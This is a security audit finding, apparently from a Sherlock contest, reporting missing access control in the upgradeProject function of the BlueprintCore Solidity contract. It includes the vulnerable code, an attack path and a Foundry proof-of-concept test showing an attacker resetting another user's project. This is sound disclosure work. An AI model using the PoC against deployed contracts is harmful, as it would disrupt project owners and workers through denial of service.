Stale Admiral Beaver

Medium

# Any user can reset project state and disrupt operations for legitimate project owners

### Summary

The `upgradeProject` function in the BlueprintCore contract lacks proper access control, allowing any user to reset the state of any project, regardless of ownership. This vulnerability enables malicious actors to disrupt legitimate projects by resetting their proposal and deployment information, causing denial of service for both project owners and workers who can no longer interact with their deployments.


### Root Cause

In [src/BlueprintCore.sol#L198-L203](https://github.com/sherlock-audit/2025-03-crestal-network/blob/main/crestal-omni-contracts/src/BlueprintCore.sol#L198-L203), the `upgradeProject` function only checks if the project exists but does not verify that the caller is the project owner:

```solidity
function upgradeProject(bytes32 projectId) public hasProject(projectId) {
    // reset project info
    projects[projectId].requestProposalID = 0;
    projects[projectId].requestDeploymentID = 0;
    projects[projectId].proposedSolverAddr = dummyAddress;
}
```

The function uses the `hasProject` modifier, which only verifies the project's existence:

```solidity
modifier hasProject(bytes32 projectId) {
    // projectId backwards compatibility
    //    projects[projectId].id != 0 --> false --> new project id created by new blueprint not exist
    //    projectIDs[projectId] != address(0) -- > false -- >. old project id created by old blueprint not exist.
    //    both 1 and 2 are false, then project id does not exist in old and new blueprint
    // slither-disable-next-line timestamp
    require(projects[projectId].id != 0 || projectIDs[projectId] != dummyAddress, "projectId does not exist");
    _;
}
```

Unlike other functions that operate on projects, there is no check to ensure that `msg.sender` is the project creator or has any authorization to modify the project.

### Internal Pre-conditions

1. A legitimate project must exist in the system
2. The project must have active proposal or deployment information

### External Pre-conditions

None - this vulnerability doesn't depend on external protocols or conditions

### Attack Path

1. Attacker identifies a target project ID (can be obtained from blockchain events)
2. Attacker calls `upgradeProject(targetProjectId)`
3. The contract resets the project's state:
   - `requestProposalID` is set to 0
   - `requestDeploymentID` is set to 0
   - `proposedSolverAddr` is set to the dummy address
4. The project's proposal and deployment information is now reset, disrupting any ongoing processes
5. Project owner and workers can no longer interact with the deployment as their operations will fail

### Impact

The vulnerability has several significant impacts:

**1. Operational Disruption:**
- Legitimate users lose their project's proposal and deployment information
- Ongoing deployments are disrupted as the link between project and deployment is broken
- Users may need to restart their project setup process from the beginning

**2. Denial of Service:**
- Attackers can repeatedly reset projects to prevent users from completing deployments
- This creates a persistent denial of service condition that cannot be mitigated without contract changes
- Project owners can no longer update deployment configurations after a reset
- Workers can no longer submit proof of deployment after a reset

**3. Worker Impact:**
- Workers may lose track of which deployments belong to which projects
- Resources spent on partially completed deployments are wasted
- Workers receive errors when trying to interact with reset deployments

**4. User Experience:**
- Users experience unexpected project resets
- Trust in the platform is diminished due to unpredictable behavior
- Users may need to recreate proposals and deployment requests

While no direct financial loss occurs (unlike the signature replay vulnerability), this issue represents a significant operational vulnerability that undermines the reliability and usability of the platform.

### PoC

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.26;

import {Test, console} from "forge-std/Test.sol";
import {Vm} from "forge-std/Vm.sol";
import {BlueprintV5} from "../src/BlueprintV5.sol";
import {BlueprintCore} from "../src/BlueprintCore.sol";

contract UpgradeProjectVulnerabilityTest is Test {
    BlueprintV5 public blueprint;
    
    // Test users
    address public projectOwner = address(0x1);
    address public attacker = address(0x2);
    address public worker = address(0x3);
    
    function setUp() public {
        // Create and initialize the blueprint contract
        blueprint = new BlueprintV5();
        blueprint.initialize();
        
        // Fund users with ETH for gas
        vm.deal(projectOwner, 10 ether);
        vm.deal(attacker, 10 ether);
        vm.deal(worker, 10 ether);
    }
    
    function test_upgradeProjectDoSImpact() public {
        // Use a different project ID for this test
        bytes32 projectId = keccak256(abi.encodePacked("test_project_2"));
        bytes32 deploymentRequestId;
        
        // 1. Project owner creates a project and deployment
        vm.startPrank(projectOwner);
        deploymentRequestId = blueprint.createProjectIDAndDeploymentRequest(
            projectId,
            "base64Proposal",
            "server.url"
        );
        vm.stopPrank();
        
        // 2. Worker accepts the deployment
        vm.startPrank(worker);
        bool accepted = blueprint.submitDeploymentRequest(projectId, deploymentRequestId);
        assertTrue(accepted, "Worker should be able to accept deployment");
        vm.stopPrank();
        
        // 3. Verify worker can update deployment status
        vm.startPrank(worker);
        // Try to submit proof of deployment (should work before attack)
        blueprint.submitProofOfDeployment(
            projectId,
            deploymentRequestId,
            "proof_data"
        );
        vm.stopPrank();
        
        // 4. Attacker resets the project
        vm.startPrank(attacker);
        blueprint.upgradeProject(projectId);
        vm.stopPrank();
        
        // 5. Project owner tries to update the deployment configuration
        vm.startPrank(projectOwner);
        try blueprint.updateWorkerDeploymentConfig(
            address(0x1234), // Some token address
            projectId,
            deploymentRequestId,
            "updated_config"
        ) {
            // If this succeeds, the test should fail
            assertTrue(false, "Should not be able to update deployment after project reset");
        } catch Error(string memory reason) {
            // This should fail with a specific error
            console.log("Error when updating deployment after reset: ", reason);
            // The exact error message might vary, but we expect some error
        }
        vm.stopPrank();
        
        // 6. Worker tries to submit another proof of deployment
        vm.startPrank(worker);
        try blueprint.submitProofOfDeployment(
            projectId,
            deploymentRequestId,
            "updated_proof_data"
        ) {
            // If this succeeds, the test should fail
            assertTrue(false, "Should not be able to submit another proof after project reset");
        } catch Error(string memory reason) {
            // This should fail with a specific error
            console.log("Error when submitting proof after reset: ", reason);
            // The exact error message might vary, but we expect some error
        }
        vm.stopPrank();
    }
}
```


### Mitigation

_No response_